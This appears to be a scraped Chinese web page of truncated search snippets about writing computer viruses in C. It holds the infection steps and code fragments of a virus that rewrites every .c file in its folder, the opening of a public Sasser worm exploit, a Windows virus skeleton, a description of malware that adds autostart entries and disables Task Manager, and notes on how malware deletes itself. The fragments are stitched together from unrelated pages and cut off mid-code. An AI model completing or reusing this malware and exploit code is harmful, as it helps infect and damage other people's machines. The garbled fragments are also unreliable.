1,主程序调用病毒功能函数 2,病毒功能函数读取查找同目录下所有c文件; 3,找到一个(被感染c文件),打开它,并且将此文件全部读取到数组变量; 4,重新创建一个同名文件(被感染c文件) 5,数组变量写回这个被感染c文件,同时将病毒源文件所需要的头文件,病毒功能函数 调用语句写入; 6,打开病毒源文件,将病毒功能函数全...
C语言病毒代码 #include<io.h> #include #include<stdio.h> #include<stdlib.h> #include<string.h> /*copyoutfiletoinfile*/ voidcopyfile(char*infile,char*outfile) { FILE*in,*out; in=fopen(infile,"r"); out=fopen(outfile,"w"); while(!feof(in)) { fputc(fgetc(in),out); } fclos...
int CodeLen = 0;//病毒代码长度 int FileLen = 0;//宿主代码长度 //病毒函数调用应当插在"main("后面的第一个"{"后面 //在C++中main有int main(),int main(int arg,char **r)等形式 int InsertLoc = 0; //提取待传播的当前文件中的病毒代码 ifstream VirusFile(obCurFileName.c_str()); for ...
#define RED “\033[01;31m” #define BANNER GREEN “[%%] ” YELL “mandragore’s sploit v1.3 for ” RED “sasser.x” NORM #define fatal(x) { perror(x); exit(1); } #define default_port 5554 struct { char *os; long goreg; long gpa; long lla;} targets[] = { // { “os”...
一个c病毒源代码 #include <windows.h> #include <Shlwapi.h> #include <fstream.h> #include <TlHelp32.h> #include <Dbt.h> #pragma comment(lib,'shlwapi.lib') #define TIMER 1//计时器 //function LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程 ...
0x8D,0xB1,0xBD,0xB5,0xBB, C语言编写简易病毒 本次实验设计的是一个基于C语言的恶意代码,其执行流程如下: 1、 在病毒第一次执行时,即检测到注册表的任务管理器没有被禁用,则病毒依次执行以下功能: 创建开机启动项,在系统目录路径下面复制文件,将其作为自启动路径...程序继续之心那个,弹窗显示C盘盘符破坏...
一个c病毒源代码 include <windows.h> include <Shlwapi.h> include <fstream.h> include <TlHelp32.h> include <Dbt.h> pragma comment(lib,"shlwapi.lib")define TIMER 1//计时器 //function LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程 //获取盘符 TCHAR FirstDrive...
一段简单的CC++病毒源程序.pdf,⼀段简单的CC++病毒源程序 主要是感染C/C++源⽂件只要编译该段源程序就会使当前⽬录⾥的所有.c和.cpp⽂件感染上病毒,当然如 果是没有主函数的源⽂件就没有作⽤:思想很简单:插⼊⼀段复制⾃⾝的代码,⽽这段代码是将
金猪报喜蠕虫病毒解密!电脑高危病毒解密!经典病毒案例不止感染桌面,还能入侵你的磁盘!!! 2.8万 28 1:24:18 App 【C/C++浪漫流星雨】程序猿独有的C语言源代码流星雨浪漫表白(内附源码)开学表白最正确的打开方式:C/C++自制满天流星滑落天际!超好看特效! 4070 25 2:48:52 App 【C/C++/EasyX】图形编程!史上最...
自删除功能对病毒木马来说同样至关重要,它通常在完成目标任务之后删除自身,不留下任何蛛丝马迹,自删除的方法有很多种,常见的有利用MoveFileEx重启删除和利用批处理删除两种方式。 (1)MoveFileEx重启删除 MOVEFILE_DELAY_UNTIL_REBOOT这个标志只能由拥有管理员权限的程序或者拥有本地系统权限的程序使用,而且这个标志不能MOV...